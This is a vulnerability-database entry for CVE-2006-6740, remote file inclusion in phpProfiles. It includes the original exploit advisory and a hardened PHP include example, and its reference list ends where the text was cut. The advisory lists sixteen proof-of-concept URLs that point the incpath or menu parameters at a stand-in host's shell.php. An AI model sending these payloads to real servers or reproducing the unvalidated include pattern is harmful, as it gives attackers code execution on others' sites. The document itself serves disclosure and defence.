PHPProfiles Multiple Remote File Inclusion Vulnerabilities

Vulnerability ID: 1111801    Vulnerability type: Code injection
Published: 2006-12-19    Updated: 2007-03-02
CVE: CVE-2006-6740    CNNVD-ID: CNNVD-200612-544
Platform: PHP    CVSS score: 7.5
|Vulnerability sources
https://www.exploit-db.com/exploits/2956
https://www.securityfocus.com/bid/21667
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200612-544
|Vulnerability details
Multiple PHP remote file inclusion vulnerabilities in phpProfiles 3.1.2b and earlier allow remote attackers to execute arbitrary PHP code via a URL in the menu parameter to (1) includes/body.inc.php or (2) include/body_admin.inc.php; or via a URL in the incpath parameter to (3) index.inc.php, (4) account.inc.php, (5) admin_newcomm.inc.php, (6) header_admin.inc.php, (7) header.inc.php, (8) friends.inc.php, (9) menu_u.inc.php, (10) notify.inc.php, (11) body.inc.php, (12) body_admin.inc.php, (13) commrecc.inc.php, (14) do_reg.inc.php, (15) comm_post.inc.php or (16) menu_v.inc.php in include/.
|Vulnerability EXP
+-------------------------------------------------------------------------------------------
+ phpProfiles <= 3.1.2b Multiple Remote File Include Vulnerabilities
+-------------------------------------------------------------------------------------------
+ Affected Software .: phpProfiles <= 3.1.2b
+ Download ..........: http://downloads.sourceforge.net/phpprofiles/phpProfiles_3_1_2.zip
+ Description .......: "phpProfiles allows you to offer visitors their very own URL on your web site simply by registering"
+ Class .............: Remote File Inclusion
+ Risk ..............: High (Remote File Execution)
+ Found By ..........: nuffsaid <nuffsaid[at]newbslove.us>
+-------------------------------------------------------------------------------------------
+ Details:
+ phpProfiles has several scripts which do not initialize variables before using them to
+ include files. Assuming register_globals = on, we can initialize any one of the variables
+ in a query string and include a remote file of our choice.
+
+ Vulnerable Code:
+ include/remove_pic.inc.php line(s) 11: include("$scriptpath/redirect.php");
+ include/body_admin.inc.php line(s) 03: <p><?include("$menu");?></p>
+ include/account.inc.php,   line(s) 09: include("$incpath/footer.inc.php");
+ include/index.inc.php,     line(s) 05: include("$incpath/adminerr.inc.php");
+ ... see below for a list of files affected.
+ 
+ Proof Of Concept:
+ http://[target]/[path]/include/body.inc.php?menu=http://evilsite.com/shell.php
+ http://[target]/[path]/include/index.inc.php?incpath=http://evilsite.com/shell.php?
+ http://[target]/[path]/include/account.inc.php?action=update&incpath=http://evilsite.com/shell.php?
+ http://[target]/[path]/include/admin_newcomm.inc.php?action=create&incpath=http://evilsite.com/shell.php?
+ http://[target]/[path]/include/header_admin.inc.php?incpath=http://evilsite.com/shell.php?
+ http://[target]/[path]/include/header.inc.php?incpath=http://evilsite.com/shell.php?
+ http://[target]/[path]/include/friends.inc.php?action=invite&incpath=http://evilsite.com/shell.php?
+ http://[target]/[path]/include/menu_u.inc.php?incpath=http://evilsite.com/shell.php?
+ http://[target]/[path]/include/notify.inc.php?action=sendit&incpath=http://evilsite.com/shell.php?
+ http://[target]/[path]/include/body.inc.php?incpath=http://evilsite.com/shell.php?
+ http://[target]/[path]/include/body_admin.inc.php?menu=http://evilsite.com/shell.php
+ http://[target]/[path]/include/body_admin.inc.php?incpath=http://evilsite.com/shell.php?
+ http://[target]/[path]/include/commrecc.inc.php?action=recommend&incpath=http://evilsite.com/shell.php?
+ http://[target]/[path]/include/do_reg.inc.php?incpath=http://evilsite.com/shell.php?
+ http://[target]/[path]/include/comm_post.inc.php?action=post&incpath=http://evilsite.com/shell.php?
+ http://[target]/[path]/include/menu_v.inc.php?incpath=http://evilsite.com/shell.php?
+-------------------------------------------------------------------------------------------

# milw0rm.com [2006-12-19]
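As an added illustration (not code from the advisory or from phpProfiles), the uninitialised-variable include pattern the advisory describes next to a hardened version. The `resolve_menu` and `hardened_include` functions, the allow-list keys, and the mapping of menu names to `menu_u.inc.php` / `menu_v.inc.php` are assumptions made for the example.

```php
<?php
// Added example, not phpProfiles code. Names not taken from the advisory
// (resolve_menu, hardened_include, $allowedMenus and its mapping) are assumptions.

// --- Vulnerable pattern (the shape shown in the advisory) ---
// $incpath and $menu are never initialised by the script. With
// register_globals = On, a request such as ?incpath=http://... populates them
// from the query string, and include() then fetches and executes the remote
// file whenever the PHP build permits URL includes (allow_url_include, or
// allow_url_fopen on PHP releases before that setting existed).
function vulnerable_include(): void
{
    global $incpath, $menu;
    include("$incpath/footer.inc.php");
    include("$menu");
}

// --- Hardened pattern ---
// 1. Never derive an include path from request data: anchor it to the
//    script's own directory with a constant.
define('INC_PATH', __DIR__);

// 2. Where the included file legitimately varies (the $menu case), map a
//    request value onto a fixed allow-list and never use the value itself.
$allowedMenus = [
    'user'  => 'menu_u.inc.php',   // assumed mapping for the example
    'admin' => 'menu_v.inc.php',
];

function resolve_menu(array $allowed, string $requested): ?string
{
    // Unknown keys resolve to null, so no path or URL from the request
    // can ever reach include().
    return array_key_exists($requested, $allowed)
        ? INC_PATH . '/' . $allowed[$requested]
        : null;
}

function hardened_include(array $allowed, array $get): void
{
    include INC_PATH . '/footer.inc.php';

    $menuFile = resolve_menu($allowed, (string)($get['menu'] ?? ''));
    if ($menuFile === null) {
        http_response_code(400);   // reject rather than include anything
        return;
    }
    include $menuFile;
}

// 3. Defence in depth in php.ini: register_globals = Off (the directive was
//    removed entirely in PHP 5.4), allow_url_include = Off, allow_url_fopen = Off.
```

Even with the allow-list in place, keeping `allow_url_include` off means an overlooked `include("$var")` elsewhere in the code base fails to fetch a remote file instead of executing it.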
|Affected products
phpProfiles phpProfiles 3.1.2b
phpProfiles phpProfiles 2.1
|References

Source: XF, Name: phpprofiles-multiple-parameters-file-include(30997), Link: http://xforce.iss.net/xforce/xfdb/30997
Source: BID, Name: 21667, Link: http://www.securityfocus.com/bid/21667
Source: MILW0RM, Name: 2956, Link: http://www.milw0rm.com/exploits/2956
Source: VUPEN, Name: ADV-2006-5087, Link: http://www.frsirt.com/english/advisories/2006/5087
Source: SECUNIA, Name: 23423, Link: http://secunia.com/advisories/23423
Source: OSVDB, Name: 32376, Link: http://www.osvdb.org/32376
Source: OSVDB, Name: 32375, Link: http://www.osvdb.org/32375
Source: OSVDB, Name: 32374, Link: http://www.osvdb.org/32374
Source: OSVDB, Name: 32373, Link: http://www.osvdb.org/32373
Source: OSVDB, Name: 32372, Link: http://www.osvdb.org/32372
Source: OSVDB, Name: 32371, Link: http://www.osvdb.org/32371
Source: OSVDB, Name: 32370, Link: http://www.osvdb.org/32370
Source: OSVDB, Name: 32369, Link: http://www.osvdb.org/32369
Source: OSVDB, Name: 32368, Link: http://www.osvdb.org/32368
Source: OSVDB, Name: 32367, Link: http://www.osvdb.org/32367
Source: OSVDB, Name: 32366, Link: http://www.osvdb.org/32366
Source: OSVDB, Name: 32365, Link: http://www.osvdb.org/32365
Source: OSVDB, Name: 32364, Link: http://www.osvdb.org/32364
Source: OSVDB, Name: 323